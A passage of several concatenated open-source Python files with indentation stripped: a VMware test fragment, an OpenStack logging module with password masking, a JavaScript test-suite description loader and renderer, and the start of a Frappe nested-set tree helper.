self.assertFalse(hasattr(virtual_device_config, 'fileOperation'))
def test_detach_virtual_disk_spec(self):
self._test_detach_virtual_disk_spec(destroy_disk=False)
def test_detach_virtual_disk_destroy_spec(self):
self._test_detach_virtual_disk_spec(destroy_disk=True)
| |
# Copyright 2011 OpenStack Foundation.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Openstack logging handler.
This module adds to logging functionality by adding the option to specify
a context object when calling the various log methods. If the context object
is not specified, default formatting is used. Additionally, an instance uuid
may be passed as part of the log message, which is intended to make it easier
for admins to find messages related to a specific instance.
It also allows setting of formatting information through conf.
"""
import inspect
import itertools
import logging
import logging.config
import logging.handlers
import os
import re
import sys
import traceback
from oslo.config import cfg
import six
from six import moves
from heat.openstack.common.gettextutils import _
from heat.openstack.common import importutils
from heat.openstack.common import jsonutils
from heat.openstack.common import local
_DEFAULT_LOG_DATE_FORMAT = "%Y-%m-%d %H:%M:%S"
_SANITIZE_KEYS = ['adminPass', 'admin_pass', 'password', 'admin_password']
# NOTE(ldbragst): Let's build a list of regex objects using the list of
# _SANITIZE_KEYS we already have. This way, we only have to add the new key
# to the list of _SANITIZE_KEYS and we can generate regular expressions
# for XML and JSON automatically.
_SANITIZE_PATTERNS = []
_FORMAT_PATTERNS = [r'(%(key)s\s*[=]\s*[\"\']).*?([\"\'])',
r'(<%(key)s>).*?(</%(key)s>)',
r'([\"\']%(key)s[\"\']\s*:\s*[\"\']).*?([\"\'])',
r'([\'"].*?%(key)s[\'"]\s*:\s*u?[\'"]).*?([\'"])']
for key in _SANITIZE_KEYS:
for pattern in _FORMAT_PATTERNS:
reg_ex = re.compile(pattern % {'key': key}, re.DOTALL)
_SANITIZE_PATTERNS.append(reg_ex)
common_cli_opts = [
cfg.BoolOpt('debug',
short='d',
default=False,
help='Print debugging output (set logging level to '
'DEBUG instead of default WARNING level).'),
cfg.BoolOpt('verbose',
short='v',
default=False,
help='Print more verbose output (set logging level to '
'INFO instead of default WARNING level).'),
]
logging_cli_opts = [
cfg.StrOpt('log-config-append',
metavar='PATH',
deprecated_name='log-config',
help='The name of logging configuration file. It does not '
'disable existing loggers, but just appends specified '
'logging configuration to any other existing logging '
'options. Please see the Python logging module '
'documentation for details on logging configuration '
'files.'),
cfg.StrOpt('log-format',
default=None,
metavar='FORMAT',
help='DEPRECATED. '
'A logging.Formatter log message format string which may '
'use any of the available logging.LogRecord attributes. '
'This option is deprecated. Please use '
'logging_context_format_string and '
'logging_default_format_string instead.'),
cfg.StrOpt('log-date-format',
default=_DEFAULT_LOG_DATE_FORMAT,
metavar='DATE_FORMAT',
help='Format string for %%(asctime)s in log records. '
'Default: %(default)s'),
cfg.StrOpt('log-file',
metavar='PATH',
deprecated_name='logfile',
help='(Optional) Name of log file to output to. '
'If no default is set, logging will go to stdout.'),
cfg.StrOpt('log-dir',
deprecated_name='logdir',
help='(Optional) The base directory used for relative '
'--log-file paths'),
cfg.BoolOpt('use-syslog',
default=False,
help='Use syslog for logging.'),
cfg.StrOpt('syslog-log-facility',
default='LOG_USER',
help='syslog facility to receive log lines')
]
generic_log_opts = [
cfg.BoolOpt('use_stderr',
default=True,
help='Log output to standard error')
]
log_opts = [
cfg.StrOpt('logging_context_format_string',
default='%(asctime)s.%(msecs)03d %(process)d %(levelname)s '
'%(name)s [%(request_id)s %(user_identity)s] '
'%(instance)s%(message)s',
help='format string to use for log messages with context'),
cfg.StrOpt('logging_default_format_string',
default='%(asctime)s.%(msecs)03d %(process)d %(levelname)s '
'%(name)s [-] %(instance)s%(message)s',
help='format string to use for log messages without context'),
cfg.StrOpt('logging_debug_format_suffix',
default='%(funcName)s %(pathname)s:%(lineno)d',
help='data to append to log format when level is DEBUG'),
cfg.StrOpt('logging_exception_prefix',
default='%(asctime)s.%(msecs)03d %(process)d TRACE %(name)s '
'%(instance)s',
help='prefix each line of exception output with this format'),
cfg.ListOpt('default_log_levels',
default=[
'amqp=WARN',
'amqplib=WARN',
'boto=WARN',
'qpid=WARN',
'sqlalchemy=WARN',
'suds=INFO',
'iso8601=WARN',
],
help='list of logger=LEVEL pairs'),
cfg.BoolOpt('publish_errors',
default=False,
help='publish error events'),
cfg.BoolOpt('fatal_deprecations',
default=False,
help='make deprecations fatal'),
# NOTE(mikal): there are two options here because sometimes we are handed
# a full instance (and could include more information), and other times we
# are just handed a UUID for the instance.
cfg.StrOpt('instance_format',
default='[instance: %(uuid)s] ',
help='If an instance is passed with the log message, format '
'it like this'),
cfg.StrOpt('instance_uuid_format',
default='[instance: %(uuid)s] ',
help='If an instance UUID is passed with the log message, '
'format it like this'),
]
CONF = cfg.CONF
CONF.register_cli_opts(common_cli_opts)
CONF.register_cli_opts(logging_cli_opts)
CONF.register_opts(generic_log_opts)
CONF.register_opts(log_opts)
# our new audit level
# NOTE(jkoelker) Since we synthesized an audit level, make the logging
# module aware of it so it acts like other levels.
logging.AUDIT = logging.INFO + 1
logging.addLevelName(logging.AUDIT, 'AUDIT')
try:
NullHandler = logging.NullHandler
except AttributeError: # NOTE(jkoelker) NullHandler added in Python 2.7
class NullHandler(logging.Handler):
def handle(self, record):
pass
def emit(self, record):
pass
def createLock(self):
self.lock = None
def _dictify_context(context):
if context is None:
return None
if not isinstance(context, dict) and getattr(context, 'to_dict', None):
context = context.to_dict()
return context
def _get_binary_name():
return os.path.basename(inspect.stack()[-1][1])
def _get_log_file_path(binary=None):
logfile = CONF.log_file
logdir = CONF.log_dir
if logfile and not logdir:
return logfile
if logfile and logdir:
return os.path.join(logdir, logfile)
if logdir:
binary = binary or _get_binary_name()
return '%s.log' % (os.path.join(logdir, binary),)
return None
def mask_password(message, secret="***"):
"""Replace password with 'secret' in message.
:param message: The string which includes security information.
:param secret: value with which to replace passwords.
:returns: The unicode value of message with the password fields masked.
For example:
>>> mask_password("'adminPass' : 'aaaaa'")
"'adminPass' : '***'"
>>> mask_password("'admin_pass' : 'aaaaa'")
"'admin_pass' : '***'"
>>> mask_password('"password" : "aaaaa"')
'"password" : "***"'
>>> mask_password("'original_password' : 'aaaaa'")
"'original_password' : '***'"
>>> mask_password("u'original_password' : u'aaaaa'")
"u'original_password' : u'***'"
"""
message = six.text_type(message)
# NOTE(ldbragst): Check to see if anything in message contains any key
# specified in _SANITIZE_KEYS, if not then just return the message since
# we don't have to mask any passwords.
if not any(key in message for key in _SANITIZE_KEYS):
return message
secret = r'\g<1>' + secret + r'\g<2>'
for pattern in _SANITIZE_PATTERNS:
message = re.sub(pattern, secret, message)
return message
class BaseLoggerAdapter(logging.LoggerAdapter):
def audit(self, msg, *args, **kwargs):
self.log(logging.AUDIT, msg, *args, **kwargs)
class LazyAdapter(BaseLoggerAdapter):
def __init__(self, name='unknown', version='unknown'):
self._logger = None
self.extra = {}
self.name = name
self.version = version
@property
def logger(self):
if not self._logger:
self._logger = getLogger(self.name, self.version)
return self._logger
class ContextAdapter(BaseLoggerAdapter):
warn = logging.LoggerAdapter.warning
def __init__(self, logger, project_name, version_string):
self.logger = logger
self.project = project_name
self.version = version_string
@property
def handlers(self):
return self.logger.handlers
def deprecated(self, msg, *args, **kwargs):
stdmsg = _("Deprecated: %s") % msg
if CONF.fatal_deprecations:
self.critical(stdmsg, *args, **kwargs)
raise DeprecatedConfig(msg=stdmsg)
else:
self.warn(stdmsg, *args, **kwargs)
def process(self, msg, kwargs):
# NOTE(mrodden): catch any Message/other object and
# coerce to unicode before they can get
# to the python logging and possibly
# cause string encoding trouble
if not isinstance(msg, six.string_types):
msg = six.text_type(msg)
if 'extra' not in kwargs:
kwargs['extra'] = {}
extra = kwargs['extra']
context = kwargs.pop('context', None)
if not context:
context = getattr(local.store, 'context', None)
if context:
extra.update(_dictify_context(context))
instance = kwargs.pop('instance', None)
instance_uuid = (extra.get('instance_uuid', None) or
kwargs.pop('instance_uuid', None))
instance_extra = ''
if instance:
instance_extra = CONF.instance_format % instance
elif instance_uuid:
instance_extra = (CONF.instance_uuid_format
% {'uuid': instance_uuid})
extra['instance'] = instance_extra
extra.setdefault('user_identity', kwargs.pop('user_identity', None))
extra['project'] = self.project
extra['version'] = self.version
extra['extra'] = extra.copy()
return msg, kwargs
class JSONFormatter(logging.Formatter):
def __init__(self, fmt=None, datefmt=None):
# NOTE(jkoelker) we ignore the fmt argument, but its still there
# since logging.config.fileConfig passes it.
self.datefmt = datefmt
def formatException(self, ei, strip_newlines=True):
lines = traceback.format_exception(*ei)
if strip_newlines:
lines = [moves.filter(
lambda x: x,
line.rstrip().splitlines()) for line in lines]
lines = list(itertools.chain(*lines))
return lines
def format(self, record):
message = {'message': record.getMessage(),
'asctime': self.formatTime(record, self.datefmt),
'name': record.name,
'msg': record.msg,
'args': record.args,
'levelname': record.levelname,
'levelno': record.levelno,
'pathname': record.pathname,
'filename': record.filename,
'module': record.module,
'lineno': record.lineno,
'funcname': record.funcName,
'created': record.created,
'msecs': record.msecs,
'relative_created': record.relativeCreated,
'thread': record.thread,
'thread_name': record.threadName,
'process_name': record.processName,
'process': record.process,
'traceback': None}
if hasattr(record, 'extra'):
message['extra'] = record.extra
if record.exc_info:
message['traceback'] = self.formatException(record.exc_info)
return jsonutils.dumps(message)
def _create_logging_excepthook(product_name):
def logging_excepthook(exc_type, value, tb):
extra = {}
if CONF.verbose or CONF.debug:
extra['exc_info'] = (exc_type, value, tb)
getLogger(product_name).critical(
"".join(traceback.format_exception_only(exc_type, value)),
**extra)
return logging_excepthook
class LogConfigError(Exception):
message = _('Error loading logging config %(log_config)s: %(err_msg)s')
def __init__(self, log_config, err_msg):
self.log_config = log_config
self.err_msg = err_msg
def __str__(self):
return self.message % dict(log_config=self.log_config,
err_msg=self.err_msg)
def _load_log_config(log_config_append):
try:
logging.config.fileConfig(log_config_append,
disable_existing_loggers=False)
except moves.configparser.Error as exc:
raise LogConfigError(log_config_append, str(exc))
def setup(product_name):
"""Setup logging."""
if CONF.log_config_append:
_load_log_config(CONF.log_config_append)
else:
_setup_logging_from_conf()
sys.excepthook = _create_logging_excepthook(product_name)
def set_defaults(logging_context_format_string):
cfg.set_defaults(log_opts,
logging_context_format_string=
logging_context_format_string)
def _find_facility_from_conf():
facility_names = logging.handlers.SysLogHandler.facility_names
facility = getattr(logging.handlers.SysLogHandler,
CONF.syslog_log_facility,
None)
if facility is None and CONF.syslog_log_facility in facility_names:
facility = facility_names.get(CONF.syslog_log_facility)
if facility is None:
valid_facilities = facility_names.keys()
consts = ['LOG_AUTH', 'LOG_AUTHPRIV', 'LOG_CRON', 'LOG_DAEMON',
'LOG_FTP', 'LOG_KERN', 'LOG_LPR', 'LOG_MAIL', 'LOG_NEWS',
'LOG_AUTH', 'LOG_SYSLOG', 'LOG_USER', 'LOG_UUCP',
'LOG_LOCAL0', 'LOG_LOCAL1', 'LOG_LOCAL2', 'LOG_LOCAL3',
'LOG_LOCAL4', 'LOG_LOCAL5', 'LOG_LOCAL6', 'LOG_LOCAL7']
valid_facilities.extend(consts)
raise TypeError(_('syslog facility must be one of: %s') %
', '.join("'%s'" % fac
for fac in valid_facilities))
return facility
def _setup_logging_from_conf():
log_root = getLogger(None).logger
for handler in log_root.handlers:
log_root.removeHandler(handler)
if CONF.use_syslog:
facility = _find_facility_from_conf()
syslog = logging.handlers.SysLogHandler(address='/dev/log',
facility=facility)
log_root.addHandler(syslog)
logpath = _get_log_file_path()
if logpath:
filelog = logging.handlers.WatchedFileHandler(logpath)
log_root.addHandler(filelog)
if CONF.use_stderr:
streamlog = ColorHandler()
log_root.addHandler(streamlog)
elif not logpath:
# pass sys.stdout as a positional argument
# python2.6 calls the argument strm, in 2.7 it's stream
streamlog = logging.StreamHandler(sys.stdout)
log_root.addHandler(streamlog)
if CONF.publish_errors:
handler = importutils.import_object(
"heat.openstack.common.log_handler.PublishErrorsHandler",
logging.ERROR)
log_root.addHandler(handler)
datefmt = CONF.log_date_format
for handler in log_root.handlers:
# NOTE(alaski): CONF.log_format overrides everything currently. This
# should be deprecated in favor of context aware formatting.
if CONF.log_format:
handler.setFormatter(logging.Formatter(fmt=CONF.log_format,
datefmt=datefmt))
log_root.info('Deprecated: log_format is now deprecated and will '
'be removed in the next release')
else:
handler.setFormatter(ContextFormatter(datefmt=datefmt))
if CONF.debug:
log_root.setLevel(logging.DEBUG)
elif CONF.verbose:
log_root.setLevel(logging.INFO)
else:
log_root.setLevel(logging.WARNING)
for pair in CONF.default_log_levels:
mod, _sep, level_name = pair.partition('=')
level = logging.getLevelName(level_name)
logger = logging.getLogger(mod)
logger.setLevel(level)
_loggers = {}
def getLogger(name='unknown', version='unknown'):
if name not in _loggers:
_loggers[name] = ContextAdapter(logging.getLogger(name),
name,
version)
return _loggers[name]
def getLazyLogger(name='unknown', version='unknown'):
"""Returns lazy logger.
Creates a pass-through logger that does not create the real logger
until it is really needed and delegates all calls to the real logger
once it is created.
"""
return LazyAdapter(name, version)
class WritableLogger(object):
"""A thin wrapper that responds to `write` and logs."""
def __init__(self, logger, level=logging.INFO):
self.logger = logger
self.level = level
def write(self, msg):
self.logger.log(self.level, msg.rstrip())
class ContextFormatter(logging.Formatter):
"""A context.RequestContext aware formatter configured through flags.
The flags used to set format strings are: logging_context_format_string
and logging_default_format_string. You can also specify
logging_debug_format_suffix to append extra formatting if the log level is
debug.
For information about what variables are available for the formatter see:
http://docs.python.org/library/logging.html#formatter
"""
def format(self, record):
"""Uses contextstring if request_id is set, otherwise default."""
# NOTE(sdague): default the fancier formatting params
# to an empty string so we don't throw an exception if
# they get used
for key in ('instance', 'color'):
if key not in record.__dict__:
record.__dict__[key] = ''
if record.__dict__.get('request_id', None):
self._fmt = CONF.logging_context_format_string
else:
self._fmt = CONF.logging_default_format_string
if (record.levelno == logging.DEBUG and
CONF.logging_debug_format_suffix):
self._fmt += " " + CONF.logging_debug_format_suffix
# Cache this on the record, Logger will respect our formatted copy
if record.exc_info:
record.exc_text = self.formatException(record.exc_info, record)
return logging.Formatter.format(self, record)
def formatException(self, exc_info, record=None):
"""Format exception output with CONF.logging_exception_prefix."""
if not record:
return logging.Formatter.formatException(self, exc_info)
stringbuffer = moves.StringIO()
traceback.print_exception(exc_info[0], exc_info[1], exc_info[2],
None, stringbuffer)
lines = stringbuffer.getvalue().split('\n')
stringbuffer.close()
if CONF.logging_exception_prefix.find('%(asctime)') != -1:
record.asctime = self.formatTime(record, self.datefmt)
formatted_lines = []
for line in lines:
pl = CONF.logging_exception_prefix % record.__dict__
fl = '%s%s' % (pl, line)
formatted_lines.append(fl)
return '\n'.join(formatted_lines)
class ColorHandler(logging.StreamHandler):
LEVEL_COLORS = {
logging.DEBUG: '\033[00;32m', # GREEN
logging.INFO: '\033[00;36m', # CYAN
logging.AUDIT: '\033[01;36m', # BOLD CYAN
logging.WARN: '\033[01;33m', # BOLD YELLOW
logging.ERROR: '\033[01;31m', # BOLD RED
logging.CRITICAL: '\033[01;31m', # BOLD RED
}
def format(self, record):
record.color = self.LEVEL_COLORS[record.levelno]
return logging.StreamHandler.format(self, record)
class DeprecatedConfig(Exception):
message = _("Fatal call to deprecated config: %(msg)s")
def __init__(self, msg):
super(Exception, self).__init__(self.message % dict(msg=msg))
| |
"""
Load test suite descriptions and generate test runner files.
"""
import yaml
import os
import os.path
from textwrap import dedent
import re
import json
from jinja2 import Environment, PackageLoader
import urllib
import logging
LOGGER = logging.getLogger(__name__)
# Set up the template environment
TEMPLATE_LOADER = PackageLoader(__package__)
TEMPLATE_ENV = Environment(
loader=TEMPLATE_LOADER, trim_blocks=True
)
TEMPLATE_ENV.filters["tojson"] = json.dumps
class SuiteDescriptionError(Exception):
"""
Raised when the suite description is invalid.
For example, if the suite description file is missing
required data.
"""
pass
class SuiteDescription(object):
"""
Description of a JavaScript test suite loaded from a file.
"""
REQUIRED_KEYS = [
'test_suite_name',
'src_paths',
'spec_paths',
'test_runner'
]
# Supported test runners
TEST_RUNNERS = ['jasmine', 'jasmine_requirejs']
def __init__(self, file_handle, root_dir):
"""
Load the test suite description from a file.
`file_handle` is a file-like object containing the test suite
description (YAML format).
`root_dir` is the directory relative to which paths are specified
in the test suite description. This directory must exist.
Raises a `SuiteDescriptionError` if the YAML file could
not be loaded or contains invalid data.
"""
# Load the YAML file describing the test suite
try:
self._desc_dict = yaml.load(file_handle.read())
except (IOError, ValueError):
raise SuiteDescriptionError("Could not load suite description file")
# Store the root directory
self._root_dir = root_dir
# Validate that we have all the required data
# Raises a `SuiteDescriptionError` if the required data is not found
self._validate_description(self._desc_dict)
# Validate the root directory
self._validate_root_dir(self._root_dir)
# Validate that the suite name is acceptable
self._validate_suite_name(self.suite_name())
# Compile exclude/include regular expressions
rules = self._desc_dict.get('include_in_page', [])
self._include_regex_list = [re.compile(r) for r in rules]
rules = self._desc_dict.get('exclude_from_page', [])
self._exclude_regex_list = [re.compile(r) for r in rules]
# Try to find all paths once, with warnings enabled
# This way, we print warnings for missing files to the
# console only one time.
self.lib_paths(enable_warnings=True)
self.spec_paths(enable_warnings=True)
self.src_paths(enable_warnings=True)
self.fixture_paths(enable_warnings=True)
def suite_name(self):
"""
Return the unique identifier for the test suite.
"""
return self._desc_dict.get('test_suite_name')
def root_dir(self):
"""
Return the root directory to which all paths in the suite
description are relative.
"""
return self._root_dir
def prepend_path(self):
"""
Return a user-defined path prepended to source file
paths in reports. May be an empty string.
"""
return self._desc_dict.get('prepend_path', '')
def lib_paths(self, only_in_page=False, enable_warnings=False):
"""
Return a list of paths to the dependency files needed by
the test suite.
If `only_in_page` is True, returns only the paths
that should be included in <script> tags on the
test runner page.
If `enable_warnings` is true, then log a warning whenever
we can't find a file we expect.
If no dependencies were specified, returns an empty list.
Preserves the order of lib directories.
Raises a `SuiteDescriptionError` if a file or directory could not be found.
"""
if 'lib_paths' in self._desc_dict:
return self._js_paths(self._desc_dict['lib_paths'],
only_in_page,
enable_warnings)
else:
return []
def src_paths(self, only_in_page=False, enable_warnings=False):
"""
Return a list of paths to JavaScript source
files used by the test suite.
If `only_in_page` is True, returns only the paths
that should be included in <script> tags on the
test runner page.
If `enable_warnings` is true, then log a warning whenever
we can't find a file we expect.
Preserves the order of source directories.
Raises a `SuiteDescriptionError` if a file or directory could not be found.
"""
return self._js_paths(self._desc_dict['src_paths'],
only_in_page,
enable_warnings)
def spec_paths(self, only_in_page=False, enable_warnings=False):
"""
Return a list of paths to JavaScript spec files used by the test suite.
If `only_in_page` is True, returns only the paths
that should be included in <script> tags on the
test runner page.
If `enable_warnings` is true, then log a warning whenever
we can't find a file we expect.
Preserves the order of spec directories.
Raises a `SuiteDescriptionError` if a file or directory could not be found.
"""
return self._js_paths(self._desc_dict['spec_paths'],
only_in_page,
enable_warnings)
def fixture_paths(self, enable_warnings=False):
"""
Return a list of paths to fixture files used by the test suite.
These can be non-JavaScript files.
If `enable_warnings` is true, then log a warning whenever
we can't find a file we expect.
Raises a `SuiteDescriptionError` if a file or directory could not be found.
"""
if 'fixture_paths' in self._desc_dict:
return self._file_paths(self._desc_dict['fixture_paths'],
enable_warnings)
else:
return []
def requirejs_path_map(self):
"""
Returns a map of aliases to paths, used by requirejs in loading files.
"""
if not "requirejs" in self._desc_dict:
return {}
return self._desc_dict["requirejs"].get("paths", {})
def requirejs_baseUrl(self):
"""
Returns a baseUrl to be appended onto the default requirejs baseUrl.
"""
if not "requirejs" in self._desc_dict:
return ""
return self._desc_dict["requirejs"].get("baseUrl", "")
def test_runner(self):
"""
Return the name of the test runner to use (e.g. "Jasmine")
"""
# We validated data in the constructor,
# so the key is guaranteed to exist
return self._desc_dict['test_runner']
def _include_in_page(self, script_path):
"""
Return True if and only if the script should be
included in the test runner page using <script> tags.
A script is included by default, UNLESS it matches
the regex rule `exclude_from_page` in the YAML description.
and it does NOT match the `include_in_page` rule.
"""
# Check if the script matches a rule to always be included
for include_regex in self._include_regex_list:
if include_regex.match(script_path) is not None:
return True
# Check if the script matches an exclude rule
for exclude_regex in self._exclude_regex_list:
if exclude_regex.match(script_path) is not None:
return False
# Default is to include it
return True
def _js_paths(self, path_list, only_in_page, enable_warnings):
"""
Find *.js files in `path_list`. See `_file_paths` for
more information.
If `only_in_page` is True, filters the results for
only JS files to be included in the test runner page
<script> tags.
If `enable_warnings` is true, then log a warning whenever
we can't find a file we expect.
"""
paths = self._file_paths(
path_list, enable_warnings,
include_func=self._is_js_file
)
if only_in_page:
return filter(self._include_in_page, paths)
else:
return paths
def _file_paths(self, path_list,
enable_warnings,
include_func=lambda file_path: True):
"""
Recursively search the directories in `path_list` for
files that satisfy `include_func`.
`path_list` is a list of file and directory paths.
`include_func` is a function that acccepts a `file_path` argument
and returns a bool indicating whether to include the file.
If `enable_warnings` is true, then log a warning whenever
we can't find a file we expect.
Returns the list of paths to each file it finds.
These are relative paths to the root directory passed
to the constructor.
Within each directory in `dir_path_list`, paths are sorted
alphabetically. However, order of the root directories
is preserved.
The paths in the resulting list are guaranteed to be unique.
Raises a `SuiteDescriptionError` if the directory could not be found.
"""
# Create a list of paths to return
# We use a list instead of a set, even though we
# want paths to be unique, because we want
# to preserve the dependency order the user
# specified.
result_paths = []
for path in path_list:
# We use the full path here so that we actually find
# the files we're looking for
full_path = os.path.join(self._root_dir, path)
# If the path is a file and satisfies the include function
# then add it to the list.
if os.path.isfile(full_path):
if include_func(full_path):
result_paths.append(full_path)
# This is a user-specified file, so we let the
# user know that we are skipping the dependency.
elif enable_warnings:
msg = "Skipping '{}' because it does not have a '.js' extension".format(path)
LOGGER.warning(msg)
# If the path is a directory, recursively search for JS files
elif os.path.isdir(full_path):
# Store all paths within this root directory, so
# we can sort them while preserving the order of
# the root directories.
inner_paths = []
for root_dir, _, filenames in os.walk(full_path):
# Look for files that satisfy the include func
for name in filenames:
if include_func(name):
inner_paths.append(os.path.join(root_dir, name))
# Sort the paths in this directory in alphabetical order
# then add them to the final list.
result_paths.extend(sorted(inner_paths, key=str.lower))
# If it's neither a file nor a directory,
# this is a user input error, so log it.
elif enable_warnings:
msg = "Could not find file or directory at '{}'".format(path)
LOGGER.warning(msg)
# Now that we've found the files we're looking for, we
# want to return relative paths to our root
# (for use in URLs)
rel_paths = [os.path.relpath(path, self._root_dir)
for path in result_paths]
# Remove duplicates, preserving the order
return self._remove_duplicates(rel_paths)
@staticmethod
def _is_js_file(file_path):
"""
Returns True only if the file at `file_path` has a .js extension.
"""
_, ext = os.path.splitext(file_path)
return ext == '.js'
@staticmethod
def _remove_duplicates(path_list):
"""
Return a list of paths with duplicates removed,
preserving the order in `path_list`.
"""
already_found = []
result = []
for path in path_list:
if not path in already_found:
result.append(path)
already_found.append(path)
return result
@classmethod
def _validate_description(cls, desc_dict):
"""
Validate that `desc_dict` (a `dict`)contains all the required data,
raising a `SuiteDescriptionError` if any key is missing.
"""
# Check that we have a dict
# The YAML syntax makes it easy to specify
# a list of dicts rather than a dict, which we expect.
if not isinstance(desc_dict, dict):
msg = dedent("""
Suite description must be a dictionary.
Check that your keys look like this:
spec_paths:
- spec
and not like this:
- spec_paths:
- spec
(note the initial - sign).""")
raise SuiteDescriptionError(msg)
# Expect that all required keys are present and non-empty
for key in cls.REQUIRED_KEYS:
# Checks for non-existent key, empty lists, and empty strings
if not desc_dict.get(key, None):
msg = "Missing required key '{}'".format(key)
raise SuiteDescriptionError(msg)
# Convert keys that can have multiple values to lists
for key in ['lib_paths', 'src_paths',
'spec_paths', 'fixture_paths',
'include_in_page', 'exclude_from_page']:
if key in desc_dict and not isinstance(desc_dict[key], list):
desc_dict[key] = [desc_dict[key]]
# Check that we are using a valid test runner
test_runner = desc_dict['test_runner']
if not test_runner in cls.TEST_RUNNERS:
msg = "'{}' is not a supported test runner.".format(test_runner)
raise SuiteDescriptionError(msg)
# Check that we are not using double-dot relative paths
for key in ['lib_paths', 'src_paths', 'spec_paths', 'fixture_paths']:
if key in desc_dict and cls.path_list_has_double_dot(desc_dict[key]):
msg = ("Paths cannot use up-level references (e.g. ../path/to/dir). " +
"Try using a symbolic link instead.")
raise SuiteDescriptionError(msg)
# Check that the prepend_path key is a string
prepend_path = desc_dict.get('prepend_path', '')
if not (isinstance(prepend_path, str) or
isinstance(prepend_path, unicode)):
msg = "Prepend path must be a string."
raise SuiteDescriptionError(msg)
@staticmethod
def _validate_suite_name(name):
"""
Suite name must be URL-encodable and not contain
any GET param characters.
"""
# If the encoding is different then the name,
# then the name is not encoded.
if urllib.quote(name) != name:
msg = "'{}' must be URL-encoded.".format(name)
raise SuiteDescriptionError(msg)
# Also can't allow anything that will throw off
# our path parsing (slashes)
if '/' in name:
msg = "'{}' cannot contain slashes".format(name)
raise SuiteDescriptionError(msg)
@staticmethod
def _validate_root_dir(root_dir):
"""
Validate that the root directory exists and is a directory,
raising a `SuiteDescriptionError` if this is not the case.
"""
if not os.path.isdir(root_dir):
msg = "'{}' is not a valid directory".format(root_dir)
raise SuiteDescriptionError(msg)
@staticmethod
def path_list_has_double_dot(path_list):
"""
Return True if any path in `path_list` uses
an up-level reference (double dot).
"""
for path in path_list:
if '..' in path.split('/'):
return True
return False
class SuiteRendererError(Exception):
"""
Raised when the test runner page could not be rendered
for a given test suite description.
"""
pass
class SuiteRenderer(object):
"""
Render a test runner page for a test suite description.
"""
# Dictionary mapping test runner names (e.g. 'jasmine') to
# templates used to render the test runner page.
TEMPLATE_DICT = {
'jasmine': 'jasmine_test_runner.html',
'jasmine_requirejs': 'jasmine_requirejs_test_runner.html',
}
# The CSS ID of the <div> that will contain the output test results
RESULTS_DIV_ID = 'js_test_tool_results'
# Expect the results page to have a <div>
# with this ID to report JavaScript exceptions
ERROR_DIV_ID = 'js_test_tool_error'
def __init__(self, dev_mode=False):
"""
If `dev_mode` is `True`, then display results in the browser
in a human-readable form.
"""
self._dev_mode = dev_mode
def render_to_string(self, suite_name, suite_desc):
"""
Given a `test_suite_desc` (`TestSuiteDescription` instance),
render a test runner page. When loaded, this page will
execute the JavaScript tests in the suite.
`suite_name` is the unique name of the suite, used to generate
links to that suite's dependencies.
Returns a unicode string.
Raises an `SuiteRendererError` if the page could not be rendered.
"""
# Get the test runner template
test_runner = suite_desc.test_runner()
template_name = self.TEMPLATE_DICT.get(test_runner)
# If we have no template for this name, raise an exception
if template_name is None:
msg = "No template defined for test runner '{}'".format(test_runner)
raise SuiteRendererError(msg)
# Create the context for the template
template_context = {
'suite_name': suite_name,
'lib_path_list': suite_desc.lib_paths(only_in_page=True),
'src_path_list': suite_desc.src_paths(only_in_page=True),
'spec_path_list': suite_desc.spec_paths(only_in_page=True),
'requirejs_path_map': suite_desc.requirejs_path_map(),
'requirejs_baseUrl': suite_desc.requirejs_baseUrl(),
'results_div_id': self.RESULTS_DIV_ID,
'error_div_id': self.ERROR_DIV_ID,
'dev_mode': self._dev_mode,
}
# Render the template
try:
html = self.render_template(template_name, template_context)
except Exception as ex:
msg = "Error occurred while rendering test runner page: {}".format(ex)
raise SuiteRendererError(msg)
return html
@staticmethod
def render_template(template_name, context):
"""
Render `template` (a Jinja2 `Template`) using `context`
(a `dict`) and return the resulting unicode string.
"""
template = TEMPLATE_ENV.get_template(template_name)
return template.render(context)
| |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
# Tree (Hierarchical) Nested Set Model (nsm)
#
# To use the nested set model,
# use the following pattern
# 1. name your parent field as "parent_item_group" if not have a property nsm_parent_field as your field name in the document class
# 2. have a field called "old_parent" in your fields list - this identifies whether the parent has been changed
# 3. call update_nsm(doc_obj) in the on_upate method
# ------------------------------------------
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.model.document import Document
from frappe.utils import now
class NestedSetRecursionError(frappe.ValidationError): pass
class NestedSetMultipleRootsError(frappe.ValidationError): pass
class NestedSetChildExistsError(frappe.ValidationError): pass
class NestedSetInvalidMergeError(frappe.ValidationError): pass
# called in the on_update method
def update_nsm(doc):
# get fields, data from the DocType
opf = 'old_parent'
pf = "parent_" + frappe.scrub(doc.doctype)
if hasattr(doc,'nsm_parent_field'):
pf = doc.nsm_parent_field
if hasattr(doc,'nsm_oldparent_field'):
opf = doc.nsm_oldparent_field
p, op = doc.get(pf) or None, doc.get(opf) or None
# has parent changed (?) or parent is None (root)
if not doc.lft and not doc.rgt:
update_add_node(doc, p or '', pf)
elif op != p:
update_move_node(doc, pf)
# set old parent
doc.set(opf, p)
frappe.db.set_value(doc.doctype, doc.name, opf, p or '', update_modified=False)
doc.reload()
def update_add_node(doc, parent, parent_field):
"""
insert a new node
"""
n = now()
doctype = doc.doctype
name = doc.name
# get the last sibling of the parent
if parent:
left, right = frappe.db.sql("select lft, rgt from `tab{0}` where name=%s"
.format(doctype), parent)[0]
validate_loop(doc.doctype, doc.name, left, right)
else: # root
right = frappe.db.sql("""
SELECT COALESCE(MAX(rgt), 0) + 1 FROM `tab{0}`
WHERE COALESCE(`{1}`, '') = ''
""".format(doctype, parent_field))[0][0]
right = right or 1
# update all on the right
frappe.db.sql("update `tab{0}` set rgt = rgt+2, modified=%s where rgt >= %s"
.format(doctype), (n, right))
frappe.db.sql("update `tab{0}` set lft = lft+2, modified=%s where lft >= %s"
.format(doctype), (n, right))
# update index of new node
if frappe.db.sql("select * from `tab{0}` where lft=%s or rgt=%s".format(doctype), (right, right+1)):
frappe.msgprint(_("Nested set error. Please contact the Administrator."))
raise Exception
